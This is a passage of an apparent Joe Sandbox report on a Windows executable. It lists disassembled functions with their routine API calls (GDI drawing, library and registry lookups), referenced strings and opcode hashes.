                                                          • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004777D9
                                                          Strings
                                                          • CallSpawnServer: Unexpected response: $%x, xrefs: 0047776A
                                                          • CallSpawnServer: Unexpected status: %d, xrefs: 004777C2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                          • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                          • API String ID: 613034392-3771334282
                                                          • Opcode ID: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                          • Instruction ID: 5facb6da61392f64ef9a6a7cc904dffa3fea64199446eda4e4b81d1598b422a3
                                                          • Opcode Fuzzy Hash: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                          • Instruction Fuzzy Hash: 0131E474F042158ADF10EBB9C8467EEB6A09B08304F90807AB508EB382D67C5E01C79D
                                                          APIs
                                                          • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045965F
                                                          Strings
                                                          • Fusion.dll, xrefs: 004595FF
                                                          • CreateAssemblyCache, xrefs: 00459656
                                                          • .NET Framework CreateAssemblyCache function failed, xrefs: 00459682
                                                          • Failed to load .NET Framework DLL "%s", xrefs: 00459644
                                                          • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045966A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                          • API String ID: 190572456-3990135632
                                                          • Opcode ID: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                          • Instruction ID: ee3dd963a50cff277cc460556b086b348bcce4d3c12070cda944c03b6b96f9ce
                                                          • Opcode Fuzzy Hash: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                          • Instruction Fuzzy Hash: 5D315771E00609EBCB01EFA5C88169EB7A5AF44315F50857BE814A7382DB7C9E09CB99
                                                          APIs
                                                            • Part of subcall function 0041C040: GetObjectA.GDI32(?,00000018), ref: 0041C04D
                                                          • GetFocus.USER32 ref: 0041C160
                                                          • 73A1A570.USER32(?), ref: 0041C16C
                                                          • 73A18830.GDI32(?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C18D
                                                          • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C199
                                                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B0
                                                          • 73A18830.GDI32(?,00000000,00000000,0041C1F2,?,?), ref: 0041C1D8
                                                          • 73A1A480.USER32(?,?,0041C1F2,?,?), ref: 0041C1E5
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A18830$A122A480A570BitsFocusObject
                                                          • String ID:
                                                          • API String ID: 2231653193-0
                                                          • Opcode ID: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                          • Instruction ID: 42301c90dcb8571f5cbc3500225c3f0eaf81cc24073f805a24a28427ce123417
                                                          • Opcode Fuzzy Hash: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                          • Instruction Fuzzy Hash: D7116D71A44618BBDF00DBE9CC81FAFB7FCEB48700F14446AB518E7281DA3899008B28
                                                          APIs
                                                          • GetSystemMetrics.USER32(0000000E), ref: 00418C68
                                                          • GetSystemMetrics.USER32(0000000D), ref: 00418C70
                                                          • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C76
                                                            • Part of subcall function 004099A8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CA4,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099AC
                                                          • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CC6
                                                          • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD1
                                                          • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000), ref: 00418CE4
                                                          • 6F530860.COMCTL32(0049B628,00418D07,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E), ref: 00418CFA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: MetricsSystem$C400C740F530860F532980
                                                          • String ID:
                                                          • API String ID: 209721339-0
                                                          • Opcode ID: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                          • Instruction ID: c5403bac5749a6cea20ad86aefc03aeb17a2f2ee6000d3a37742d6553dc7a201
                                                          • Opcode Fuzzy Hash: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                          • Instruction Fuzzy Hash: 981124B1B44304BFDB10EBA9EC82F5E73B8DB48714F50406AB504EB2C2DAB99D408659
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004832E0), ref: 004832C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                          • API String ID: 47109696-2530820420
                                                          • Opcode ID: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                          • Instruction ID: b53b4caf4df369742718f420b864b5eadf64457ff5313130662490eff196aabe
                                                          • Opcode Fuzzy Hash: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                          • Instruction Fuzzy Hash: 7E115130704244AADB10FFA59852B5F7BA8DB55B05F6188B7A800A7282D7389E02871D
                                                          APIs
                                                          • 73A1A570.USER32(00000000,?,?,00000000), ref: 00494A25
                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00494A47
                                                          • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00494FC5), ref: 00494A5B
                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 00494A7D
                                                          • 73A1A480.USER32(00000000,00000000,00494AA7,00494AA0,?,00000000,?,?,00000000), ref: 00494A9A
                                                          Strings
                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494A52
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                          • API String ID: 1435929781-222967699
                                                          • Opcode ID: 8e4816187cf5e8e7c6dd84ba3c8161288e1479147e1e53052227e353a50aa1d3
                                                          • Instruction ID: 4a1d9e00790e4e8279befe01d539e981fbc0a950f87c09723c3c89301347e02c
                                                          • Opcode Fuzzy Hash: 8e4816187cf5e8e7c6dd84ba3c8161288e1479147e1e53052227e353a50aa1d3
                                                          • Instruction Fuzzy Hash: FA015E76A44604AFDB14DBA9CC41E5EB7ECDB48704F610476B604E7281DA78AE008B6C
                                                          APIs
                                                          • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                          • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                          • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                          • DeleteDC.GDI32(?), ref: 0041B4D1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ObjectSelect$Delete$Stretch
                                                          • String ID:
                                                          • API String ID: 1458357782-0
                                                          • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                          • Instruction ID: d121cbdfe682723b668f1aba97a5ca8eb2ba63952d9ca8216d3140e682204302
                                                          • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                          • Instruction Fuzzy Hash: 46115C72E00619ABDB10DAD9DD85FEFB7BCEF08704F144555B614F7281C678AC418BA8
                                                          APIs
                                                          • GetCursorPos.USER32 ref: 004233A7
                                                          • WindowFromPoint.USER32(?,?), ref: 004233B4
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233C2
                                                          • GetCurrentThreadId.KERNEL32 ref: 004233C9
                                                          • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233E2
                                                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004233F9
                                                          • SetCursor.USER32(00000000), ref: 0042340B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                          • String ID:
                                                          • API String ID: 1770779139-0
                                                          • Opcode ID: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                          • Instruction ID: 5b5036a29de233914ad27f5bfe0a39b591155b03ca34aa4f0141610fd726b6de
                                                          • Opcode Fuzzy Hash: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                          • Instruction Fuzzy Hash: 3501D4323046102AD6217B755C82E2F26E8DB85B29F60447FF504BB287DA3DAD11936D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494848
                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494855
                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494862
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                          • API String ID: 667068680-2254406584
                                                          • Opcode ID: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                          • Instruction ID: 57979f0f623c6713f86cfc51a9e85cc39870524a60e3ac3170e58067450f8277
                                                          • Opcode Fuzzy Hash: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                          • Instruction Fuzzy Hash: 68F0F69AB01F5526DA20B5A69C42E7B6ACCCBC17A4F150137FD04B73C2E99C8C0242FD
                                                          APIs
                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D4B1
                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045D4C1
                                                          • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045D4D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                          • API String ID: 190572456-212574377
                                                          • Opcode ID: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                          • Instruction ID: 50a43070f27201e9cf87661d87b97551d06431c7276cd5b4b6d770057bc484c9
                                                          • Opcode Fuzzy Hash: cecd0a63045edb33e2202c29c90cf8f934e5a60212dd894f2f8d3c432b3cebaf
                                                          • Instruction Fuzzy Hash: 4AF0B2B0D00701DAE724DFB65CC77263A959B6431AF1084379A4D55373D67814498F2D
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,004808CA), ref: 0042EA2D
                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA33
                                                          • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA44
                                                            • Part of subcall function 0042E9A4: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA68,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9BA
                                                            • Part of subcall function 0042E9A4: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C0
                                                            • Part of subcall function 0042E9A4: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D1
                                                          • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457011,004573B4,00456F68,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA58
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                          • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                          • API String ID: 142928637-2676053874
                                                          • Opcode ID: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
                                                          • Instruction ID: b6413d45aefc5bd916056b1696ea31cacbebf8ca5ba9e8247451a7316c99a6de
                                                          • Opcode Fuzzy Hash: 527a2f903435c6b8eae660c7438eac079e405392c9f84945f8436c24f6679cfa
                                                          • Instruction Fuzzy Hash: C9E092A1741720EAEE10B7BA7D86FAA2558EB5072DF540037F100A51E1C7BD1C80CE9E
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F081), ref: 0044C7E3
                                                          • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7F4
                                                          • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C804
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad
                                                          • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                          • API String ID: 2238633743-1050967733
                                                          • Opcode ID: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
                                                          • Instruction ID: ee0778b55076bf214b63aaf44073c79067fceb62e20c2f516a440ec7c4faf5ed
                                                          • Opcode Fuzzy Hash: 20d4d3efedc32434c77936c95fe9c73e42e1c540f2b792c07eccd7c7435f7152
                                                          • Instruction Fuzzy Hash: 2FF0FE70242302CAF750ABB5FDD97563694E7E471AF14237BE401551A1D7BD4444CB8C
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498130), ref: 004786BA
                                                          • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004786C7
                                                          • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004786D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                          • API String ID: 667068680-222143506
                                                          • Opcode ID: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                          • Instruction ID: 2026d18a05cb2035c6a6e54b58e3f317de058d113ce64fa581f90165bcddcee3
                                                          • Opcode Fuzzy Hash: 037c1e48967f880c8f75eb608e42e3021eac6f548ba3101ad95a3bedc305e175
                                                          • Instruction Fuzzy Hash: F5C0E9F06C1701EA9640B7F15CDAD7A2558D520729720943F755EA6192D9BC4C104A6C
                                                          APIs
                                                          • GetFocus.USER32 ref: 0041B73D
                                                          • 73A1A570.USER32(?), ref: 0041B749
                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B77E
                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B814,?,?), ref: 0041B78A
                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7B8
                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041B7F9,?,?,00000000,00000000,0041B7F2,?,00000000,0041B814,?,?), ref: 0041B7EC
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A18830$A122A26310A570Focus
                                                          • String ID:
                                                          • API String ID: 3906783838-0
                                                          • Opcode ID: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                          • Instruction ID: 1a6b37f464f6ee1ac690d44aa7d10d16b676852f44f67843991ec4a9ec0a7b01
                                                          • Opcode Fuzzy Hash: 7028b3360e085542d185f93eaa985fb71498e3c9d3761fe797ea6f9089370fd6
                                                          • Instruction Fuzzy Hash: D9512070A002099FCF11DFA9C891AEEBBF8EF49704F10446AF514A7790D7799981CBA9
                                                          APIs
                                                          • GetFocus.USER32 ref: 0041BA0F
                                                          • 73A1A570.USER32(?), ref: 0041BA1B
                                                          • 73A18830.GDI32(00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA55
                                                          • 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BAE1,?,?), ref: 0041BA61
                                                          • 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BA85
                                                          • 73A18830.GDI32(00000000,00000000,00000000,0041BAC6,?,?,00000000,00000000,0041BABF,?,00000000,0041BAE1,?,?), ref: 0041BAB9
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: A18830$A122A26310A570Focus
                                                          • String ID:
                                                          • API String ID: 3906783838-0
                                                          • Opcode ID: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
                                                          • Instruction ID: 148f6e74122d55113d3717465da8055643ee1b9490db959cdfcac8ccc7d3b8de
                                                          • Opcode Fuzzy Hash: 6afe2cc59a527faaede1d3d34b45dc336484c23e3dd063350b4c8de36bb0c79b
